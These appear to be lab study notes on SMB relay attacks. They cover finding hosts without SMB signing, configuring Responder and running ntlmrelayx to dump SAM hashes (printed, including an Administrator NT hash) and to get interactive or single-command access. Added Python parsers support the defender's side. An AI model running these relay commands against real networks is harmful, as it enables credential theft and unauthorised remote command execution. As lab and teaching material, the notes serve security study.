Instead of cracking the captured hash, PASS/RELAY it to gain access!
By default:
SMB signing is disabled on user accounts
SMB signing is enabled on server accounts
Identify Hosts without SMB Signing:
nmap --script=smb2-security-mode.nse -p445 192.168.218.136 -Pn
-Pn skips host discovery and scans the host anyway
adjusting Responder:
sudo mousepad /etc/responder/Responder.conf
switch SMB and HTTP to Off (so Responder does not answer those itself and the relay tool can handle them)
then run responder
Scanning Domain Controller:
Message signing enabled and REQUIRED. Can’t do it.
Scanning one of the computers:
Message signing enabled but NOT REQUIRED. What we want.
You can run it against the whole subnet and pull out the hosts where signing is not required with grep:
nmap --script=smb2-security-mode.nse -p445 192.168.218.0/24 -Pn | grep not -A 2
DISCORD TIP: USE CME
cme smb 192.168.218.0/24 --gen-relay-list relay.list
Note: SPIDERMAN was offline, which is why it wasn't found!
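Both the nmap-plus-grep step and the CME --gen-relay-list step produce the same thing: an inventory of hosts that accept unsigned SMB sessions. That list is the relay target file for the attacker and, read the other way, the remediation list for the defender (hosts where RequireSecuritySignature must be turned on). The script below is an added example, not part of the original notes or of any tool mentioned here; it parses smb2-security-mode output instead of relying on `grep not -A 2`, classifies every scanned host, and returns the ones that need fixing. The nmap text and addresses inside it are constructed sample data in the script's normal output format.

```python
"""Inventory SMB signing state from `nmap --script smb2-security-mode` output.

Added example (not from the original notes). Classifies each scanned host
as 'required', 'not_required', 'disabled' or 'unknown' and lists the hosts
that accept unsigned SMB, i.e. the relay targets / remediation list.
"""
import re
from typing import Dict, List

# CONSTRUCTED sample of `nmap --script=smb2-security-mode.nse -p445 ... -Pn`
# output: one host requiring signing, one not requiring it, one with no
# script result because 445 was filtered. Addresses are placeholders.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.218.1
Host is up (0.00031s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.168.218.136
Host is up (0.00044s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.218.200
Host is up (0.00052s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
"""

# Each host's block starts with this header; the capture group keeps the address.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.MULTILINE)
# The script's verdict line, e.g. "Message signing enabled but not required".
SIGNING_RE = re.compile(r"Message signing (.+)$", re.MULTILINE)


def parse_signing_state(nmap_text: str) -> Dict[str, str]:
    """Map each scanned host to 'required', 'not_required', 'disabled' or 'unknown'.

    'unknown' covers hosts where the script produced no verdict (port closed or
    filtered, or SMB2 not negotiated), which is exactly what a bare grep skips
    silently.
    """
    states: Dict[str, str] = {}
    # re.split with a capture group yields [preamble, host1, body1, host2, body2, ...]
    chunks = HOST_RE.split(nmap_text)
    for host, body in zip(chunks[1::2], chunks[2::2]):
        match = SIGNING_RE.search(body)
        if match is None:
            states[host] = "unknown"
            continue
        verdict = match.group(1).lower()
        # Order matters: "not required" must be tested before "required",
        # because the 'required' verdict is a substring of both wordings.
        if "not required" in verdict:
            states[host] = "not_required"
        elif "required" in verdict:
            states[host] = "required"
        elif "disabled" in verdict:
            states[host] = "disabled"
        else:
            states[host] = "unknown"
    return states


def relay_candidates(states: Dict[str, str]) -> List[str]:
    """Hosts that accept unsigned SMB: the relay target list and the fix list."""
    return sorted(h for h, s in states.items() if s in ("not_required", "disabled"))


if __name__ == "__main__":
    found = parse_signing_state(SAMPLE_NMAP_OUTPUT)
    for host, state in sorted(found.items()):
        print(f"{host:<16} {state}")
    print("signing not enforced on:", ", ".join(relay_candidates(found)) or "none")
```

Feed it real output with `nmap ... -oN scan.txt` and `parse_signing_state(open("scan.txt").read())`; the returned list is the same set of hosts the grep or `--gen-relay-list` gives, and on the defender side it is the set where signing must be made required (the state the domain controller already shows in the scan above) before a relay becomes impossible.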
relay.list can be used with ntlmrelayx
ntlmrelayx.py -tf relay.list -smb2support
-tf is target file. Could be relay.list or it could be targets.txt if we did it the nmap way!
Hashes dumped:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8018cdf5a02e39797ef1cd07b654939c:::
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
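The dump above is in pwdump format (user:RID:LM hash:NT hash:::), which is what ntlmrelayx prints when it dumps the SAM of a relayed host. When such a dump shows up in an engagement report, the first questions are which accounts are now compromised and must be rotated, which have a blank password, whether LM hashes are being stored at all, and which accounts share a password. The parser below is an added example, not part of the original notes or of ntlmrelayx; the sample lines and the non-well-known hash values in them are constructed placeholders, not credential hashes from the notes.

```python
"""Triage a pwdump-style SAM dump (user:rid:lmhash:nthash:::).

Added example (not from the original notes). Parses the format ntlmrelayx
prints and flags blank passwords, stored LM hashes and password reuse.
"""
from collections import defaultdict
from typing import Dict, List

# Well-known constants: the LM hash field when no LM hash is stored, and the
# NT hash (MD4 of the empty UTF-16LE string) of a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# CONSTRUCTED sample: placeholder hex values, not real credential hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
legacyuser:1003:0123456789abcdef0123456789abcdef:ffeeddccbbaa99887766554433221100:::
"""


def parse_pwdump(text: str) -> List[Dict[str, object]]:
    """Parse pwdump lines into dicts; reject lines that do not fit the format."""
    entries: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad RID or hash length in line: {line!r}")
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def triage(entries: List[Dict[str, object]]) -> Dict[str, list]:
    """Answer the incident-response questions about a dumped SAM.

    Every account listed is compromised and needs rotation; the findings
    below are the ones to rotate first and the host settings to fix.
    """
    findings: Dict[str, list] = {
        "blank_password": [],   # NT hash equals the empty-password hash
        "lm_hash_stored": [],   # LM field is not the no-LM constant: LM storage is on
        "shared_password": [],  # groups of accounts with identical NT hashes
    }
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        user = str(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(user)
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(user)
        by_nt[str(e["nt"])].append(user)
    for nt, users in by_nt.items():
        # Blank-password accounts are already reported; everything else that
        # shares a hash shares a password.
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_password"].append(sorted(users))
    return findings


if __name__ == "__main__":
    result = triage(parse_pwdump(SAMPLE_DUMP))
    for key, value in result.items():
        print(f"{key}: {value}")
```

Built-in accounts such as Guest and DefaultAccount normally carry the blank-password NT hash because they are disabled, so a blank-password hit on a RID of 500 or above 1000 is the one that matters; a non-empty LM field means the host is still storing LM hashes and the NoLMHash policy should be checked.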
to use interactive mode:
ntlmrelayx.py -tf relay.list -smb2support -i
and listen to it with:
nc 127.0.0.1 11000
you can type help to list the available commands!
to run a single command on the target instead of an interactive shell:
ntlmrelayx.py -tf relay.list -smb2support -c "whoami"